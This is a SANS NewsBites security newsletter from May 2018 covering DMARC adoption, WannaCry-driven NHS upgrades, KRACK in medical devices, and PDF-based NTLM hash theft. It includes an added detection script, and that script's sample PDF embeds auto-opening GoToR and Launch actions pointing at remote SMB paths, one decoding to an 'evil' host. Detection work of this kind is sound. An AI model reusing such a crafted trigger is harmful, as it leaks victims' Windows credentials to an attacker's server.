

SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XX - Issue #34

May 1, 2018

The National Cloud In-Security Panel's list of the ten most critical and damaging errors AWS users are making is published here along with the workshop invitation:

Washington, DC on June 8: https://www.sans.org/event/cloud-insecurity-summit-dc

Austin, TX on June 11: https://www.sans.org/event/cloud-insecurity-summit-tx





  Government Tops in DMARC Adoption
  What Makes a Cybersecurity Team Successful?


  UK National Health Service Systems Will Be Upgraded to Windows 10
  Microsoft's Trusted Cyber Physical Systems Project
  Thailand Seizes Server Allegedly Used by Hidden Cobra APT Group
  Prison Sentence for Jail System Hacker
  KRACK Vulnerability Affects BD Pyxis Medical Devices
  NATO Locked Shields Cyber Defense Exercise
  Malicious PDF Files Can Steal Windows NTLM Hashes
  Google and Microsoft Urge Georgia Governor to Veto Computer Crimes Bill
  DHS to Establish Bug Disclosure Policy


***************************  Sponsored By ExtraHop  ************************

Does your SOC feel reactive, flooded with alerts on assets you can't see and data you can't trust? There's hope. Join Jon Oltsik (Sr. Principal Analyst, ESG) and ExtraHop for fresh research on how to build an action-oriented security architecture with complete visibility, advanced analytics, and automated investigation. Register: http://www.sans.org/info/203630


-- SANS Security West 2018 | San Diego, CA | May 11-18 | https://www.sans.org/event/security-west-2018

-- SANS Melbourne 2018 | May 14-26 | https://www.sans.org/event/melbourne-2018

-- SANS Northern VA Reston Spring 2018 | May 20-25 | https://www.sans.org/event/northern-va-reston-spring-2018

-- SANS Amsterdam May 2018 | May 28-June 2 | https://www.sans.org/event/amsterdam-may-2018

-- SANS Rocky Mountain 2018 | Denver, CO | June 4-9 | https://www.sans.org/event/rocky-mountain-2018

-- SANS London June 2018 | June 4-12 | https://www.sans.org/event/london-june-2018

-- DFIR Summit & Training 2018 | Austin, TX | June 7-14 | https://www.sans.org/event/digital-forensics-summit-2018

-- Cloud In-Security Summit - DC | Crystal City, VA | June 8 | https://www.sans.org/event/cloud-insecurity-summit-dc

-- Cloud In-Security Summit - Austin | Austin, TX | June 11 | https://www.sans.org/event/cloud-insecurity-summit-tx

-- SANS Cyber Defence Canberra 2018 | June 25-July 7 | https://www.sans.org/event/cyber-defence-canberra-2018

-- SANS OnDemand and vLive Training

The SANS Training you want with the flexibility you need.

Special Offer: Get an iPad Pro with Smart Keyboard, a Microsoft Surface Pro or Take $350 Off with OnDemand or vLive Training until May 2.


-- Can't travel? SANS offers online instruction for maximum flexibility

-- Live Daytime training with Simulcast | https://www.sans.org/simulcast

-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive

-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/

-- Single Course Training

SANS Mentor |  https://www.sans.org/mentor/about

Community SANS | https://www.sans.org/community/


-- View the full SANS course catalog and Cyber Security Skills Roadmap






Government Tops in DMARC Adoption

(April 26, 2018)

A study from ValiMail found that the US federal government has a higher rate of DMARC adoption than any other sector. Last fall, the Department of Homeland Security (DHS) issued Binding Operational Directive 18-01, which required all federal agencies to adopt DMARC by January 2018. The ValiMail study found that at the end of the first quarter of 2018, 68 percent of federal government domains had deployed DMARC; the tech sector was at 50 percent, banks at 36 percent, health care at 26 percent, and media companies at 13 percent. Before the DHS deadline, the federal adoption rate was 19 percent. A separate study from the Global Cyber Alliance noted that most federal contractors had not adopted DMARC.

[Editor Comments]

[Murray] DMARC resists a broadly used and successful attack; it is efficient; its cost is low when compared to the reduction in risk. It should be part of the essential measures undertaken by all enterprises.

[Neely] DMARC is a useful base capability which helps identify and allow quarantine or blocking of messages which inappropriately use your domain. There are now multiple reliable services that will help you analyze DMARC reports as well as help verify you're correctly implementing DMARC well before you impact any email traffic flows.

[Pescatore] The business disruption rate in DMARC adoption in private industry has been very low. There are easy lessons learned for avoiding the problems of years ago. The adoption rate remains low because there have been no forcing functions in the various compliance regimes. Supply chain security efforts should include DMARC adoption requirements in all RFPs and heavily weight them in evaluation criteria.

Read more in:

Nextgov: Government Leads Major Industries In Email Security


DHS: Binding Operational Directive 18-01
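The pre-flight check Neely's comment describes, as an added example that is not part of the original item, ValiMail's study or the DHS directive: a small linter that parses a DMARC TXT record and reports whether it actually enforces anything. The records it is run on are constructed for the example, not records published by any real domain; the tag names follow RFC 7489.

```python
"""Lint a DMARC TXT record before tightening its policy (added example)."""
import re

VALID_POLICIES = ("none", "quarantine", "reject")
_TAG_RE = re.compile(r"^([A-Za-z]+)\s*=\s*(.*)$", re.DOTALL)


def parse_dmarc(record: str) -> dict:
    """Split a DMARC record into an ordered tag -> value mapping.

    RFC 7489 requires the record to begin with v=DMARC1 (matched exactly);
    that is also how a receiver tells a DMARC record from any other TXT
    record published at _dmarc.<domain>.
    """
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        m = _TAG_RE.match(part)
        if not m:
            raise ValueError(f"malformed tag: {part!r}")
        tags[m.group(1)] = m.group(2).strip()
    if next(iter(tags), None) != "v" or tags["v"] != "DMARC1":
        raise ValueError("not a DMARC record: must begin with v=DMARC1")
    return tags


def grade_dmarc(record: str) -> dict:
    """Report what a record enforces and the gaps that bite in practice."""
    tags = parse_dmarc(record)
    policy = tags.get("p", "").lower()
    if policy not in VALID_POLICIES:
        raise ValueError(f"missing or invalid p= tag: {policy!r}")
    pct = int(tags.get("pct", "100"))
    sub_policy = tags.get("sp", policy).lower()
    # Aggregate (rua) reports are the only way to learn which legitimate
    # senders would fail before moving from none to quarantine/reject.
    rua = [u.strip() for u in tags.get("rua", "").split(",") if u.strip()]
    findings = []
    if not rua:
        findings.append("no rua= address: aggregate reports will never arrive")
    elif not all(u.startswith("mailto:") for u in rua):
        findings.append("rua= entries must be mailto: URIs")
    if policy == "none":
        findings.append("p=none only monitors; spoofed mail is still delivered")
    if pct < 100:
        findings.append(f"pct={pct}: policy applied to only {pct}% of failing mail")
    if sub_policy == "none" and policy != "none":
        findings.append("sp=none: subdomains can still be spoofed")
    return {
        "policy": policy,
        "subdomain_policy": sub_policy,
        "pct": pct,
        "rua": rua,
        # A p=reject record with pct=10 still lets 90% of spoofed mail through.
        "enforcing": policy != "none" and pct == 100,
        "findings": findings,
    }


# Constructed sample records for the demonstration (not any real domain's).
SAMPLE_RECORDS = {
    "monitor-only": "v=DMARC1; p=none; rua=mailto:dmarc@example.gov",
    "partial": "v=DMARC1; p=reject; pct=10; rua=mailto:dmarc@example.gov",
    "enforcing": "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@example.gov",
    "no-reports": "v=DMARC1; p=quarantine",
}

if __name__ == "__main__":
    for label, rec in SAMPLE_RECORDS.items():
        g = grade_dmarc(rec)
        print(f"{label:12s} p={g['policy']:<10s} enforcing={g['enforcing']}")
        for f in g["findings"]:
            print(f"{'':12s}  - {f}")
```

In practice the record to feed in is the TXT record at _dmarc.<domain>; the "enforcing" flag is deliberately strict, because a reject policy with a partial pct or a none subdomain policy is what a spoofer will find and use.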



What Makes a Cybersecurity Team Successful?


(April 27, 2018)

The US Army Research Laboratory has found that the best-performing cybersecurity teams interact the least: rather than coordinating constantly, members of strong teams already know their roles and responsibilities. The researchers drew their conclusions from observing teams competing at the Mid-Atlantic Collegiate Cyber Defense Competition earlier this spring.

[Editor Comments]

[Pescatore] A lot of the news coverage of this has been very click-baity along the lines of "less interaction makes cybersecurity teams better." The real point is "well prepared, well trained, well managed teams using mature processes will perform better, and need less ad hoc personal interaction to do so." The other key point is a defensive exercise is very different from the day to day work of cybersecurity teams where interaction with management, IT and business units (external to the security team) is critical for successfully protecting the business.

[Murray] One difference between a "team" and any other group of people is a "plan."  At a minimum, a plan will say who will do what and when they will do it. This has been part of military doctrine since Ancient Rome.

Read more in:

US Army Research Laboratory: Cybersecurity teams that don't interact much perform best


Ars Technica: Army researchers find the best cyber teams are antisocial cyber teams


GCN: Want better security? Start by shutting up


**************************  SPONSORED LINKS  ********************************

1) GDPR: Key Considerations on the Path to Compliance. Learn how Splunk can help you address key articles. http://www.sans.org/info/203635

2) Don't Miss: "Tailored Intelligence for Automated Remediation: SANS Review of IntSights' Enterprise Intelligence and Mitigation Platform" Register: http://www.sans.org/info/203640

3) Join SANS for the 2nd Annual Automotive Cybersecurity Summit, May 7-8, in Chicago. http://www.sans.org/info/203645




UK National Health Service Systems Will Be Upgraded to Windows 10

(April 30, 2018)

The UK's Department of Health and Social Care says it has reached a deal with Microsoft to migrate all National Health Service (NHS) computers to Windows 10. One third of NHS trusts fell prey to the WannaCry ransomware attack a year ago, resulting in thousands of cancelled appointments and operations. Information from Microsoft and Kaspersky suggests that 98 percent of systems affected by WannaCry were running Windows 7. The Department of Health and Social Care is also establishing an NHS Digital Security Operation Centre.   

[Editor Comments]

[Neely] Beyond just upgrading systems to Windows 10, NHS is also working on defense in depth by addressing firewall, network security and alerting to build an effective SOC.

[Murray] Most software has a limited life. Enterprise use of that software should include a plan for end of life. That plan must address the uncertainty about what will replace the software and when it will be available.

Read more in:

Digital Health: NHS to be upgraded to Windows 10 as government agree to Microsoft deal


SC Magazine: NHS' new £150m Microsoft deal to upgrade all legacy systems to Windows 10


The Register: Brit healthcare system inks Windows 10 install pact with Microsoft


Bleeping Computer: UK Health Agency Switches to Windows 10 Citing WannaCry Ransomware Outbreak




Microsoft's Trusted Cyber Physical Systems Project

(April 24 & 30, 2018)

Microsoft's Trusted Cyber Physical Systems (TCPS) project "seeks to provide end-to-end security that is resilient to today's cyber-attacks" against industrial control systems (ICS) at organizations responsible for critical infrastructure. TCPS relies on four properties: "separation of critical execution, inspectability of execution process, attestability of processing environment, and minimizing number of entities that must be trusted."

Read more in:

Windows Blog: Trusted Cyber Physical Systems looks to protect your critical infrastructure from modern threats in the world of IoT


Bleeping Computer: Microsoft Wants to Secure IoT and ICS Devices With New TCPS Project




Thailand Seizes Server Allegedly Used by Hidden Cobra APT Group

(April 27 & 30, 2018)

Thailand's Computer Emergency Response Team (ThaiCERT) has seized a server believed to have been operated by the North Korean APT group known as Hidden Cobra as a command-and-control server for the GhostSecret campaign. ThaiCERT is working with McAfee and law enforcement authorities to analyze the machine, which was found at a university in Bangkok.

Read more in:

The Register: Thailand seizes server linked to North Korean attack gang


SC Magazine: Secret no more: North Korea the likely culprit in complex GhostSecret cyber espionage campaign


Threatpost: ThaiCERT Seizes Hidden Cobra Server Linked to GhostSecret, Sony Attacks




Prison Sentence for Jail System Hacker

(April 26, 28, & 30, 2018)

A judge in Michigan has sentenced Konrads Voits to 87 months in prison for breaking into a county jail's computer system and altering data in an attempt to get an inmate released early. Voits was also ordered to pay $235,488 USD in restitution. Voits used social engineering to trick jail staff into installing malware on their computers; once he was inside the system, his activity was detected immediately.

[Editor Comments]

[Williams] Continuous network monitoring is key to all organizations and appears to have saved the day here. Though this sounds like the plot to a movie, without good security monitoring, it is possible that inmates might have been released early. Though sentencing records can probably not be modified directly from prison computers, time credits, early release information, and good behavior records probably can be. Far too often government organizations have little to no network monitoring.

Read more in:

ZDNet: Man who hacked jail systems to free associate sent behind bars


Bleeping Computer: Long Prison Sentence for Man Who Hacked Jail Computer System to Bust Out Friend


DOJ: Ypsilanti Man Sentenced in Computer Intrusion Case


Document Cloud: Voits Plea Agreement (December 1, 2017)



KRACK Vulnerability Affects BD Pyxis Medical Devices

(April 24 & 30, 2018)

Multiple medical devices made by Becton, Dickinson and Company (BD) have been found to be vulnerable to the KRACK key-reinstallation attack. KRACK is a flaw in the WPA and WPA2 Wi-Fi protocols themselves rather than in any one vendor's code, and it can only be exploited by an attacker within radio range of the device's wireless network, where it could be used to steal and alter patient data. The issue affects the BD Pyxis medication and supply management system, which is used in at least a dozen products. Patches are available for some of the affected products.

Read more in:

ICS-CERT: Advisory (ICSMA-18-114-01) BD Pyxis


BD: Product security bulletin for WPA2 "KRACK" Wi-Fi Vulnerability


Threatpost: KRACK Vulnerability Puts Medical Devices at Risk




NATO Locked Shields Cyber Defense Exercise

(April 27, 2018)

NATO's Cooperative Cyber Defence Centre of Excellence (CCDCOE) ran its annual Locked Shields cyber defense exercise in Estonia last week. Twenty-two blue teams made up of cyber security experts from NATO members and partner nations defended the fictional country of Berylia against digital attacks on a military airbase and a major Internet service provider. More than 1,000 people from 30 countries took part in this year's exercise.

[Editor Comments]

[Murray] "We fight as we train as we fight." An attack against electrical and financial infrastructure might be a more productive training assumption.

Read more in:

CCDCOE: More than 1000 cyber experts from 30 nations took part in Locked Shields


ZDNet: This giant cyber defence exercise has teams defending power grids, 4G networks, drones from hacker attack


SC Magazine UK: Nato wins largest cyber-defence exercise; Portugal, Australia join CCDCOE




Malicious PDF Files Can Steal Windows NTLM Hashes

(April 26 & 27, 2018)

Researchers from Check Point have found that maliciously crafted PDF files can be used to steal Windows credentials: the victim need only open a PDF that references a remote document, and the reader's attempt to fetch that document over SMB causes Windows to authenticate to the attacker's server, handing over the user's NTLM hash. The attack was tested only on Adobe Acrobat and Foxit Reader, but other PDF readers are likely vulnerable as well.

[Editor Comments]

[Ullrich] This type of vulnerability is not exactly new and has been fixed in other software (for example web browsers). The problem is that a system can be tricked into connecting to a malicious SMB server if a user opens a document that loads external resources via SMB. This was a big problem for web browsers that attempted to load resources like images via SMB if an SMB URL was provided. Most organizations understand that it is important to block inbound SMB connections. But outbound SMB connections are often allowed which then leads to software being able to connect to SMB servers (and passing credentials to them).

[Williams] This is just a variation on a long-running trick that uses MS Office files. It's worth noting that this isn't an issue if you just block TCP ports 135, 139, and 445 outbound from the network. If these are blocked outbound, then the only vector for exploiting this is if an attacker delivers the PDF from inside the network (in which case the game is already over).

Read more in:

Check Point: NTLM Credentials Theft via PDF Files


Bleeping Computer: PDF Files Can Be Abused to Steal Windows Credentials
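The detection check a practitioner would want alongside the egress filtering Williams describes, as an added example that is not Check Point's proof of concept or code from any of the sources above: a small Python scanner that walks a PDF's uncompressed objects looking for GoToR, GoToE and Launch actions whose file specification points at a UNC path or an SMB/file URL, which is exactly the kind of external resource reference Ullrich describes. The PDF it scans is constructed for the example; the action names and the /F key are standard PDF dictionary syntax, and the classification of "//" paths as remote is a deliberately conservative assumption.

```python
"""Flag PDF actions whose file specification points at a remote SMB path.

Added example: a byte-level heuristic, not a full PDF parser.
"""
import re

# Any "N G obj ... endobj" region of an uncompressed PDF.
_OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(?P<body>.*?)\bendobj", re.DOTALL)
# Action types that make the viewer open another file on the user's behalf.
_ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE|Launch)\b")
# /F as a literal string (...) or a hex string <...>. Dictionary-form file
# specifications carry an inner /F string, which this pattern also finds.
_FILESPEC_RE = re.compile(
    rb"/F\s*(?:\((?P<lit>(?:\\.|[^\\)])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)", re.DOTALL
)


def _decode_filespec(m) -> str:
    r"""Turn a PDF string token into the path the viewer would actually use.

    In a PDF literal string a UNC path \\host\share is written
    (\\\\host\\share), so each escaped pair collapses to one character.
    Octal escapes are not expanded; they are rare in file specifications.
    """
    if m.group("hex") is not None:
        clean = re.sub(rb"\s", b"", m.group("hex")).decode("ascii")
        if len(clean) % 2:          # PDF allows an odd digit count; pad with 0
            clean += "0"
        return bytes.fromhex(clean).decode("latin-1")
    return re.sub(rb"\\(.)", rb"\1", m.group("lit"), flags=re.DOTALL).decode("latin-1")


def is_remote(path: str) -> bool:
    """True for targets Windows would reach over SMB (UNC) or as a URL.

    A leading "//" (the portable form of a server path) is treated as remote
    as a conservative assumption; a reviewer can downgrade it if it is noisy.
    """
    p = path.strip().lower()
    return p.startswith("\\\\") or p.startswith("//") or p.startswith(("smb:", "file:"))


def find_remote_actions(pdf: bytes) -> list:
    """Return every GoToR/GoToE/Launch action whose /F target is remote.

    Works on the raw bytes of uncompressed objects only; actions hidden in
    FlateDecode streams or object streams must be inflated first.
    """
    hits = []
    for obj in _OBJ_RE.finditer(pdf):
        body = obj.group("body")
        action = _ACTION_RE.search(body)
        if not action:
            continue
        for fs in _FILESPEC_RE.finditer(body):
            target = _decode_filespec(fs)
            if is_remote(target):
                hits.append({
                    "object": int(obj.group(1)),
                    "action": action.group(1).decode("ascii"),
                    "target": target,
                })
    return hits


# Constructed sample, not a real malicious file: object 4 is the kind of
# GoToR action the attack relies on (opened automatically via /OpenAction),
# object 6 the same idea through /Launch with a hex-encoded path, and
# object 5 a harmless local reference for contrast.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /Type /Action /S /GoToR /F (\\\\10.0.0.5\\share\\doc.pdf) /D [0 /Fit] >>
endobj
5 0 obj
<< /Type /Action /S /GoToR /F (local.pdf) /D [0 /Fit] >>
endobj
6 0 obj
<< /Type /Action /S /Launch /F <5C5C6576696C5C735C612E706466> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for hit in find_remote_actions(SAMPLE_PDF):
        print(f"object {hit['object']}: /{hit['action']} -> {hit['target']}")
```

Because real samples usually keep their objects compressed, run the scanner on a copy that has been expanded first (for example with qpdf's --qdf --object-streams=disable options); a hit is a reason to quarantine the file, while a clean result only says the heuristic found nothing in what it could read. Blocking outbound TCP 135, 139 and 445 at the perimeter, as Williams notes, stops the credential leak regardless of whether the file is caught.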




Google and Microsoft Urge Georgia Governor to Veto Computer Crimes Bill

(April 27, 2018)

In an April 16, 2018 letter, Google and Microsoft asked the governor of the US state of Georgia to veto a computer crimes bill passed by the state's general assembly. The companies object to an exemption in the bill that would allow hacking back against adversaries "under the undefined guise of cybersecurity," noting that the provision could easily be abused. The bill has also been criticized by those who say it could stifle legitimate security research.

[Editor Comments]

[Pescatore] The language in the bill in almost all areas is waaay too broad to be of any benefit to any business other than law firms who will get paid on both sides of frivolous law suits that would invariably lead to the language of the bill being made more specific. Better to fix it now.

[Northcutt] The New Yorker just released a piece that is making the rounds of cybersecurity mailing lists that gives another perspective on hacking back: https://www.newyorker.com/magazine/2018/05/07/the-digital-vigilantes-who-hack-back

Read more in:

Cyberscoop: Google and Microsoft ask Georgia governor to veto 'hack back' bill


Georgia General Assembly Legislation: SB 315




DHS to Establish Bug Disclosure Policy

(April 26, 2018)

The US Department of Homeland Security (DHS) plans to create a bug disclosure policy that will pave the way for ethical hackers to notify the agency when they discover security issues in its public-facing websites and tools. DHS currently has an informal bug disclosure process. An established policy would not only provide a specific point of contact but also clarify how those searching for bugs can do so without violating agency policies and federal laws.


Read more in:

Nextgov: DHS Plans To Formalize Bug Disclosure Policy





A Few Sample Drupal Exploits Including CVE-2018-7602


Triggering SMB Connections to Steal NTLM Credentials via PDFs


NTFS Crash DoS Exploit Published for Windows 10 and 7


Apple HomeKit/Secure Element Problems


Azucar: Assessing Azure Security



April WebLogic Patch Incomplete and Intense Scanning for WebLogic Under Way


FacexWorm Spreads Malicious Chrome Extensions via Facebook


$15 DTV Transmitter as an SDR



The Editorial Board of SANS NewsBites


John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.

Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is Chief Cybersecurity Strategist at vArmour and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.

Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Eric Cornelius is Director of Critical Infrastructure and ICS at Cylance, and earlier served as deputy director and chief technical analyst for the Control Systems Security Program at the US Department of Homeland Security.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create